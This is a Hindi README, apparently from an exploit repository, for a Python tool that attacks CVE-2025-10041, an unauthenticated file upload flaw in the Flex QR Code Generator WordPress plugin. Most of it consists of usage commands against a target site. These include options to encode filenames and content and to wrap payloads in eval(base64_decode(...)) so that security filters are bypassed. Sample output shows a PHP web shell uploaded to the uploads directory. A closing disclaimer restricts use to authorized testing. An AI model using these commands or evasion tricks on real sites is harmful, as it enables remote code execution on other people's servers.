
Flex QR Code Generator <= 1.2.5 - अप्रमाणित मनमाना फ़ाइल अपलोड
Flex QR Code Generator <= 1.2.5 - प्रमाणीकरण रहित मनमाना फ़ाइल अपलोड
Flex QR Code Generator वर्डप्रेस प्लगइन save_qr_code_to_db() फ़ंक्शन में फ़ाइल प्रकार सत्यापन की कमी के कारण संस्करण 1.2.5 तक (और शामिल) मनमाना फ़ाइल अपलोड के लिए असुरक्षित है।
यह प्रमाणीकरण रहित हमलावरों को प्रभावित साइट के सर्वर पर दुर्भावनापूर्ण फ़ाइलें अपलोड करने की अनुमति देता है, जिससे संभावित रूप से रिमोट कोड निष्पादन हो सकता है।
CVE-2025-100419.8 (क्रिटिकल)CVE-2025-10041.py एक पेशेवर शोषण उपकरण है जो इस कमजोरी का लाभ उठाकर हमले को स्वचालित करने के लिए डिज़ाइन किया गया है।
यह सामान्य सुरक्षा उपायों और एन्कोडिंग तकनीकों को बायपास करने के लिए उन्नत सुविधाएँ प्रदान करता है।
python3 CVE-2025-10041.py -u http://target.com
python3 CVE-2025-10041.py -u http://target.com --encode_filename base64
python3 CVE-2025-10041.py -u http://target.com --encode_filename url
python3 CVE-2025-10041.py -u http://target.com --encode_content base64
python3 CVE-2025-10041.py -u http://target.com --shellname myevil.php
python3 CVE-2025-10041.py -u http://target.com --encode_content base64 --encode_filename base64 --shellname myevil.php
python3 CVE-2025-10041.py -u http://target.com --headers "X-Forwarded-For: 127.0.0.1" "Cookie: PHPSESSID=1337"
सभी उपलब्ध विकल्पों और उपयोग निर्देशों को देखने के लिए:
python3 CVE-2025-10041.py --help
.php या संदिग्ध नामों को ब्लॉक करते हैं; एन्कोडिंग फ़िल्टर को बायपास कर सकती है।eval(base64_decode(...)) में लपेटने से सामग्री फ़िल्टर को बायपास किया जा सकता है।Checking vulnerability version...
Target is vulnerable ...
Exploiting ...
Uploading shell 'shell.php' ...
Shell uploaded successfully.
Shell path (guess): /wp-content/uploads/shell_3.php
Response: {...}
यह स्क्रिप्ट केवल शैक्षिक, शोध और अधिकृत पैठ परीक्षण उद्देश्यों के लिए प्रदान की गई है।
उन सिस्टमों के विरुद्ध अनधिकृत उपयोग जिनके आप मालिक नहीं हैं या जिनका परीक्षण करने की आपको स्पष्ट अनुमति नहीं है, सख्त वर्जित और अवैध है।
लेखक इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।
Nxploited (Khaled Alenazi)